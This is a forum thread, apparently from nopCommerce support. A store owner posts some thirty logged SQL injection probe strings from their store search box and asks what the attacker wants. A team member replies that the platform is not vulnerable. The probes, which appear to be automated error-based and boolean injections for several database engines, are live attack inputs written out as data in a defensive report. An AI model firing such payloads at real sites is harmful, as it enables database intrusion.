SQL Injection in Store Search

This topic was automatically closed 365 days after the last reply. New replies are no longer allowed.
9 years ago
Hi Guys,

Since early morning today, we are getting following search queries from our stores. I understand its SQL injection and added a max length check and logic to detect sql injection and prevent it to reach sql server.

but just wanted to know what searching person is trying to understand/study? it is safe to ignore?

Search terms are given below. "Enter Model Number or Cartridge Code" is our default search text box text. IP is suppose to be a German.

Enter Model Number or Cartridge Code) AND 2895=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (2895=2895) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)||CHR(62))) FROM DUAL) AND (9170=9170

Enter Model Number or Cartridge Code%' AND 4911=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(104)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (4911=4911) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='

Enter Model Number or Cartridge Code%' AND 9729=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(105)||CHR(110)||CHR(113)||(SELECT (CASE WHEN (9729=9729) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(106)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='

Enter Model Number or Cartridge Code%' AND 2895=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (2895=2895) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='

Enter Model Number or Cartridge Code') AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND ('KzHP'='KzHP

Enter Model Number or Cartridge Code') AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND ('SdsF'='SdsF

Enter Model Number or Cartridge Code' AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND 'cvvd'='cvvd

Enter Model Number or Cartridge Code' AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND 'zIAo'='zIAo

Enter Model Number or Cartridge Code') AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND ('lukU'='lukU

Enter Model Number or Cartridge Code' AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND 'gvys'='gvys

Enter Model Number or Cartridge Code) AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND (9658=9658

Enter Model Number or Cartridge Code) AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND (2502=2502

Enter Model Number or Cartridge Code%' AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND '%'='

Enter Model Number or Cartridge Code%' AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND '%'='

Enter Model Number or Cartridge Code%' AND (SELECT 2396 FROM(SELECT COUNT(*),CONCAT(0x7170617a71,(SELECT (CASE WHEN (2396=2396) THEN 1 ELSE 0 END)),0x7177637971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='

Enter Model Number or Cartridge Code%' AND (SELECT 6528 FROM(SELECT COUNT(*),CONCAT(0x7178696e71,(SELECT (CASE WHEN (6528=6528) THEN 1 ELSE 0 END)),0x71776a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='

Enter Model Number or Cartridge Code%' AND (SELECT 9422 FROM(SELECT COUNT(*),CONCAT(0x7171686a71,(SELECT (CASE WHEN (9422=9422) THEN 1 ELSE 0 END)),0x716a716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='

Enter Model Number or Cartridge Code%' AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND '%'='

Enter Model Number or Cartridge Code') AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND ('iWJF'='iWJF

Enter Model Number or Cartridge Code AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113)))-- ZgIZ

Enter Model Number or Cartridge Code' AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND 'CJnu'='CJnu

Enter Model Number or Cartridge Code AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113)))-- PYgY

Enter Model Number or Cartridge Code AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113)))-- TXpN

Enter Model Number or Cartridge Code) AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND (8167=8167

Enter Model Number or Cartridge Code%' AND 9841=CAST((CHR(113)||CHR(120)||CHR(105)||CHR(110)||CHR(113))||(SELECT (CASE WHEN (9841=9841) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(106)||CHR(122)||CHR(113)) AS NUMERIC) AND '%'='

Enter Model Number or Cartridge Code%' AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND '%'='

Enter Model Number or Cartridge Code AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113)))

Enter Model Number or Cartridge Code AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113)))

Enter Model Number or Cartridge Code AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113)))

Enter Model Number or Cartridge Code AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC)-- CuDa

Enter Model Number or Cartridge Code AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC)
Kind Regards,
Jey

Please up vote if my answer did help you to solve your problem.
0
9 years ago
Hi Jey,

No worries. nopCommerce is not vulnerable to sql injection. Ignore these hack attempts
Interested in the dedicated Premium support services provided by core developers? Please visit https://www.nopcommerce.com/nopcommerce-premium-support-services

Regards,
Andrei Mazulnitsyn
nopCommerce team
0
This topic was automatically closed 365 days after the last reply. New replies are no longer allowed.